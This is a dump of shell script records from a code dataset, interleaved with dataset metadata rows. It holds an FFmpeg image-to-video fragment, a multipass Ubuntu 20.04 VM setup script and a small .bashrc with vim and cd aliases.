# extract filename and extension from input file path
filename=$(basename -- "$input_file")
extension="${filename##*.}"
filename="${filename%.*}"
# Output name is "<basename>_<duration>s.mp4".  The previous line read
# "$(unknown)_..." — running a nonexistent command `unknown` — almost
# certainly a scrubbed placeholder for ${filename}.
output_file="${filename}_${duration}s.mp4"
# NOTE(review): "<USER>" below looks like a redacted literal; substitute
# the real home directory (e.g. "$HOME/tmp") before use.
# run FFmpeg command to create video from image, checking its status
# directly instead of via a separate $? test
if ffmpeg -loop 1 -i "$input_file" -t "$duration" -pix_fmt yuv420p "/home/<USER>/tmp/$output_file"; then
echo "Video created successfully: $output_file"
else
echo "Error creating video from image: $input_file"
exit 1
fi
| true
|
3eccbdc5d6ddc84e2a30f6ae07da754c01b227e3
|
Shell
|
sammtcbn/dotfiles
|
/multipass_scripts/ubt2004_pure.bash
|
UTF-8
| 584
| 3.09375
| 3
|
[] |
no_license
|
#!/bin/bash
function wait_multipass_ready()
{
    # Block until the multipass daemon answers `multipass list`
    # (stderr suppressed; the listing itself still prints), polling
    # once per second.
    until multipass list 2> /dev/null
    do
        echo waiting ...
        sleep 1
    done
}
# Install multipass via snap, launch an Ubuntu 20.04 VM named ubt2004,
# then print network/list/info diagnostics.  Each command is echoed
# before it runs.
vmname=ubt2004
echo sudo snap install multipass --classic
sudo snap install multipass --classic
echo
# Wait for the freshly installed daemon before talking to it.
wait_multipass_ready
echo multipass launch --name ${vmname} "20.04"
multipass launch --name ${vmname} "20.04"
echo
wait_multipass_ready
echo multipass networks
multipass networks
echo
echo multipass list
multipass list
echo
echo multipass info ${vmname}
multipass info ${vmname}
| true
|
3e19704b94be63d431f11f5fc3c04fe19ae69da2
|
Shell
|
yangjin97/config
|
/.bashrc
|
UTF-8
| 176
| 2.671875
| 3
|
[] |
no_license
|
export PATH="$PATH:$HOME/.rvm/bin" # Add RVM to PATH for scripting
#alias vim="vim -S ~/.vimrc"
# Use the /usr/local/bin vim build and always source ~/.vimrc explicitly.
alias vim="/usr/local/bin/vim -S ~/.vimrc"
# cs: cd into a directory and immediately list its contents.
function cs () {
cd "$@" && ls
}
| true
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.